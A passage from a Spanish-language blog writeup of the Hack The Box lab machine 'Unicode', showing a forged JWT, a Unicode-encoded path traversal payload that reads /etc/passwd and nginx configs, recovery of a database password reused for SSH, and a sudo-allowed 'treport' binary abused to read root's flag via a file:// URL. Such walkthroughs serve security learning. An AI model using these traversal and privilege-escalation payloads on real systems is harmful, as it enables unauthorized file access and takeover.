class="lineno">1
</pre><td class="rouge-code"><pre>❯ python -m http.server 8080
</pre></table></code></div></div><p>Editamos la cookie con el token JWT malicioso y recargamos la página.</p><p><img data-src="/assets/img/commons/unicode/dashboard.png" alt="Dashboard" class="center-image" data-proofer-ignore> <em>Panel de Administración</em></p><p>Analizando el panel de adminitración podemos ver algunas cosas interesantes como la url del apartado <code class="language-plaintext highlighter-rouge">Current month</code> y <code class="language-plaintext highlighter-rouge">Last quarter</code>. A simple vista se hace parecido a un LFI (Local File Inclusion), sin embargo, no conseguimos acceder a ningun archivo, tendremos que tirar de algún bypass para poder listar archivos. Buscando encontré la siguiente <a href="https://jlajara.gitlab.io/web/2020/02/19/Bypass_WAF_Unicode.html">página</a>.</p><p>Entre todos los bypass que he visto solo he encontrado uno que me haya servido, es el siguiente:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://hackmedia.htb/display/?page=%E2%80%A4%E2%80%A4%EF%BC%8F%E2%80%A4%E2%80%A4%EF%BC%8F%E2%80%A4%E2%80%A4%EF%BC%8F%E2%80%A4%E2%80%A4%EF%BC%8Fetc%EF%BC%8Fpasswd
</pre></table></code></div></div><p>Ya tenemos una forma potencial de enumerar archivos, como se esta utilizando <code class="language-plaintext highlighter-rouge">nginx</code> como servidor web podríamos empezar a enumerar los archivos de configuración del servidor. Empezaremos con el fichero <code class="language-plaintext highlighter-rouge">/etc/nginx/nginx.conf</code>.</p><p>El fichero llama a otros recursos, empezaremos a enumerar lo que hay dentro de estas carpetas. Encontramos un fichero muy interesante ubicado en <code class="language-plaintext highlighter-rouge">/etc/nginx/sites-enabled/default</code>, este fichero nos indica la existencia de un fichero con credenciales, las credenciales son guardadas en el fichero <code class="language-plaintext highlighter-rouge">/home/code/coder/db.yaml</code>. Accedemos al archivo y veremos las credenciales.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>mysql_host: "localhost"
mysql_user: "code"
mysql_password: "B3stC0d3r2021@@!"
mysql_db: "user"
</pre></table></code></div></div><p>Estas credenciales nos servirán para conectarnos por ssh.</p><h1 id="post-explotación">Post-explotación</h1><p>Ya podemos leer la flag del usuario</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>❯ cat user.txt
bb562deb8b7b476e****************
</pre></table></code></div></div><p>Vamos a ver si podemos interactuar con algun ejecutable sin proporcionar contraseñas.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>❯ sudo -l
Matching Defaults entries for code on code:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User code may run the following commands on code:
    (root) NOPASSWD: /usr/bin/treport
</pre></table></code></div></div><p>Vemos que podemos interactuar con el ejectuble <code class="language-plaintext highlighter-rouge">treport</code> como el usuario root sin proporcionar contraseña.</p><p>Al ejecurtarlo nos da 3 opciones, crear un reporte, leer un reporte o descargar un reporte. En este punto lo que podriamos hacer es descargarnos como un reporte la flag de root.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>❯ sudo treport 
1.Create Threat Report.
2.Read Threat Report.
3.Download A Threat Report.
4.Quit.
❯ Enter your choice:3
❯ Enter the IP/file_name:File:///root/root.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    33  100    33    0     0  16500      0 --:--:-- --:--:-- --:--:-- 16500
❯ Enter your choice:2
ALL THE THREAT REPORTS:
threat_report_08_59_01
❯ Enter the filename:threat_report_08_59_01
25bebc130f32b387****************
</pre></table></code></div></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/writeup/'>Writeup</a>, <a href='/categories/htb/'>HTB</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/linux/" class="post-tag no-text-decoration" >Linux</a> <a href="/tags/ctf/" class="post-tag no-text-decoration" >CTF</a> <a href="/tags/medium/" class="post-tag no-text-decoration" >Medium</a> <a href="/tags/jwt/" class="post-tag no-text-decoration" >JWT</a> <a href="/tags/lfi/" class="post-tag no-text-decoration" >LFI</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> Esta entrada está licenciada bajo <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> por el autor.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Compartir</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Unicode+Writeup+-+xDaNN1&url=https%3A%2F%2Fxdann1.github.io%2Fposts%2Fwriteup-unicode%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Unicode+Writeup+-+xDaNN1&u=https%3A%2F%2Fxdann1.github.io%2Fposts%2Fwriteup-unicode%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fxdann1.github.io%2Fposts%2Fwriteup-unicode%2F&text=Unicode+Writeup+-+xDaNN1" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Fxdann1.github.io%2Fposts%2Fwriteup-unicode%2F" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin"> <i class="fa-fw fab fa-linkedin"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copiar enlace" data-title-succeed="¡Enlace copiado!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Actualizado recientemente</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/inyecciones-sql/">Inyecciones SQL</a><li><a href="/posts/oscp-review/">OSCP Review</a><li><a href="/posts/crto-review/">CRTO Review</a><li><a href="/posts/writeup-sizzle/">Sizzle Writeup</a></ul></div><div id="access-tags"><div class="panel-heading">Etiquetas populares</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ctf/">CTF</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/easy/">Easy</a> <a class="post-tag" href="/tags/sqli/">SQLi</a> <a class="post-tag" href="/tags/certificaci%C3%B3n/">Certificación</a> <a class="post-tag" href="/tags/lfi/">LFI</a> <a class="post-tag" href="/tags/pentesting/">Pentesting</a> <a class="post-tag" href="/tags/suid/">SUID</a> <a class="post-tag" href="/tags/crackeo-contrase%C3%B1as/">Crackeo Contraseñas</a> <a class="post-tag" href="/tags/cve/">CVE</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contenido</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Lecturas adicionales</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/writeup-paper/"><div class="card-body"> <em class="timeago small" data-ts="1655503200" > 2022-06-18 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Paper Writeup</h3><div class="text-muted small"><p> Máquina Easy, nos aprovechamos de un filtrado de información para acceder a un subdominio el cual tiene una vulnerabilidad que nos permite ver información oculta, conseguimos autenticarnos contra u...</p></div></div></a></div><div class="card"> <a href="/posts/writeup-goodgames/"><div class="card-body"> <em class="timeago small" data-ts="1661724000" > 2022-08-29 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>GoodGames Writeup</h3><div class="text-muted small"><p> Máquina Easy, nos aprovechamos de una inyección SQL para saltarnos el panel de login, convirtiendonos en el usuario administrador de la página, encontramos un subdominio y metemos en él unas creden...</p></div></div></a></div><div class="card"> <a href="/posts/writeup-backdoor/"><div class="card-body"> <em class="timeago small" data-ts="1651010400" > 2022-04-27 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Backdoor Writeup</h3><div class="text-muted small"><p> Máquina Easy, encontramos un plugin vulnerable a un LFI, lo juntamos con un Directory Traversal y conseguimos ver un proceso vulnerable a un RCE, por último, conseguimos aprovecharnos de un binario...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/writeup-backdoor/" class="btn btn-outline-primary" prompt="Anterior"><p>Backdoor Writeup</p></a> <a href="/posts/writeup-pandora/" class="btn btn-outline-primary" prompt="Nuevo"><p>Pandora Writeup</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://github.com/xdann1">xdann1</a>. <span data-toggle="tooltip" data-placement="top" title="Salvo que se indique explícitamente, las entradas de este blog están licenciadas bajo la Creative Commons Attribution 4.0 International (CC BY 4.0) License por el autor.">Algunos derechos reservados.</span></p></div><div class="footer-right"><p class="mb-0"> Hecho con <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> usando el tema <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> .</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Etiquetas populares</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ctf/">CTF</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/easy/">Easy</a> <a class="post-tag" href="/tags/sqli/">SQLi</a> <a class="post-tag" href="/tags/certificaci%C3%B3n/">Certificación</a> <a class="post-tag" href="/tags/lfi/">LFI</a> <a class="post-tag" href="/tags/pentesting/">Pentesting</a> <a class="post-tag" href="/tags/suid/">SUID</a> <a class="post-tag" href="/tags/crackeo-contrase%C3%B1as/">Crackeo Contraseñas</a> <a class="post-tag" href="/tags/cve/">CVE</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">¡Oops! No se encuentran resultados.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/es.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
